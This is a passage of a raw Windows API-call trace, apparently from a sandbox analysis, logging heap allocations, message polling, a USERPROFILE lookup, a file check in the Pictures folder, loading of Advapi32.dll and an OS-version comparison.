[0256.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0256.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0256.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0256.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0256.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9390 | out: hHeap=0x25c0000) returned 1 [0256.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9390 [0256.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0256.692] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0256.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0256.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0256.692] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0256.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0256.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0256.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0256.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1898 [0256.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0256.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0256.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0256.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0256.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0256.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0256.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0256.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0256.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0256.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0256.693] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0256.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0256.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0256.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d50 [0256.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0256.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0256.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9648 [0256.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0256.693] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf3b0, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0256.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0256.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0256.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0256.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0256.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0256.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0256.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0256.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0256.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0256.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0256.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0256.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0256.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0256.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0256.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0256.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0256.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24b3190 [0256.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0256.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0256.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0256.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0256.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0256.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0256.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0256.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0256.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0256.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0256.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0256.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2de8 [0256.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0256.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0256.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0256.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0256.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0256.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0256.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0256.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0256.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0256.696] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0256.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0256.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0256.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa830 [0256.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0256.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0256.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9648 [0256.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0256.696] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf3b0, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0256.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0256.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0256.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0256.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0256.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0256.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0256.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0256.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0256.696] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0256.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0256.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0256.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0256.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0256.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0256.697] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0256.697] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.697] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0256.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0256.697] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0256.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0256.697] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0256.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0256.698] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0256.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0256.698] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures/VLD3Nk1TIwkGNmyGPC.bmp", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79631700, ftCreationTime.dwHighDateTime=0x1d4c782, ftLastAccessTime.dwLowDateTime=0x2fdb3700, ftLastAccessTime.dwHighDateTime=0x1d4d35a, ftLastWriteTime.dwLowDateTime=0x2fdb3700, ftLastWriteTime.dwHighDateTime=0x1d4d35a, nFileSizeHigh=0x0, nFileSizeLow=0xd25, dwReserved0=0xa5e0047, dwReserved1=0x1fff4, cFileName="VLD3Nk1TIwkGNmyGPC.bmp", cAlternateFileName="VLD3NK~1.BMP")) returned 0xaa5820 [0256.698] FindClose (in: hFindFile=0xaa5820 | out: hFindFile=0xaa5820) returned 1 [0256.698] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0256.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0256.698] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0256.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0256.698] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0256.698] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0256.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0256.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0256.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0256.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0256.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0256.699] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0256.699] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.699] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0256.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0256.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0256.699] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0256.699] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0256.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0256.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0256.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0256.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0256.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0256.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0256.700] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0256.700] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0256.700] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0256.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0256.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0256.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0256.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0256.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0256.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0256.700] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0256.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0256.700] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0256.700] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0256.700] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0256.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0256.701] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0256.701] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0256.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0256.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0256.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0256.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0256.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0256.701] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0256.701] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.701] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0256.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0256.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0256.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0256.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0256.701] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.701] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0256.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0256.702] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0256.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0256.702] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0256.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0256.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0256.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0256.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0256.702] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0256.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0256.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0256.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ab328 [0256.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0256.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0256.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d20 [0256.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0256.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0256.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0256.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0256.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0256.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0256.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0256.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0256.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0256.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0256.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0256.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0256.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0256.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0256.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0256.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0256.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0256.703] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0256.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0256.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0256.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0256.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0256.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0256.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0256.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0256.704] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0256.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0256.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0256.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0256.704] 